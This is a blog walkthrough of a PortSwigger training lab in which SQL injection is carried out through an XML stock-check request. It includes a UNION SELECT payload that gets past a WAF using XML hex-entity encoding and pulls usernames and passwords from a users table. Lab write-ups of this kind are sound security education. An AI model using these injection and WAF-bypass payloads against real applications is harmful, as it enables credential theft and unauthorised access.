Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

Joel O.Joel O.
2 min read

Lab Scenario: Our objective is to understand and exploit a SQL injection vulnerability in the WHERE clause of a web application's stock check feature. By carefully probing and bypassing security measures, we aim to retrieve hidden data and ultimately solve the lab. Let's embark on this journey using Burp Suite:

  1. Identifying the Vulnerability:

    • Observe that the stock check feature sends the productId and storeId to the application in XML format.

    • Send the POST /product/stock request to Burp Repeater.

  2. Probing for Injection Points:

    • In Burp Repeater, probe the storeId to see if your input is evaluated. Try replacing the ID with mathematical expressions to evaluate other potential IDs:

        xmlCopy code<storeId>1+1</storeId>

    • Observe that your input appears to be evaluated, returning stock information for different stores.

  3. Bypassing the Web Application Firewall (WAF):

    • Attempt to determine the number of columns returned by the original query using a UNION SELECT statement. Note that your request may be blocked.

        xmlCopy code<storeId>1 UNION SELECT NULL</storeId>

    • Bypass the WAF by obfuscating your payload using XML entities. Utilize tools like Hackvertor extension to encode entities.

    • Resend the request and confirm that you receive a normal response, indicating successful WAF bypass.

  4. Crafting the Exploit:

    • Deduce that the query returns a single column. Attempting to return more than one column results in an error.

    • Concatenate the returned usernames and passwords using SQL injection:

        xmlCopy code<storeId><@hex_entities>1 UNION SELECT username || '~' || password FROM users<@/hex_entities></storeId>

    • Observe that you've successfully fetched usernames and passwords from the database, separated by a ~ character.

  5. Solving the Lab:

    • Use the administrator's credentials obtained from the exploit to log in and solve the lab.

Conclusion

This hands-on lab provides practical insights into exploiting SQL injection vulnerabilities in the WHERE clause, showcasing the potential risks associated with inadequate security measures. By following this step-by-step guide, users can enhance their skills in identifying, exploiting, and mitigating SQL injection flaws. Stay informed, keep learning, and continue exploring the dynamic field of cybersecurity to contribute to a more secure online environment.

Reference:

https://portswigger.net/web-security/sql-injection

https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding

1
Subscribe to my newsletter

Read articles from Joel O. directly inside your inbox. Subscribe to the newsletter, and don't miss out.

#sqlinjectionBurpsuite websecurityportswiggerSQLi#cybersecurityhandson

Written by

Joel O.
Joel O.

A passionate cybersecurity enthusiast and cloud aficionado. I am on a mission to unravel the complexities of the ever-evolving cyber landscape and guide you through the vast expanse of cloud technology. As a cybersecurity professional, I bring a wealth of experience in securing digital ecosystems and defending against cyber threats. My journey in the cloud realm has been both thrilling and enlightening, and I am here to share my insights, discoveries, and practical tips with you. In these virtual pages, expect a fusion of in-depth cybersecurity analyses and explorations into the limitless possibilities of cloud computing and cybersecurity. Whether you're a seasoned cybersecurity professional, a cloud enthusiast, or someone just stepping into the digital frontier, there's something here for you.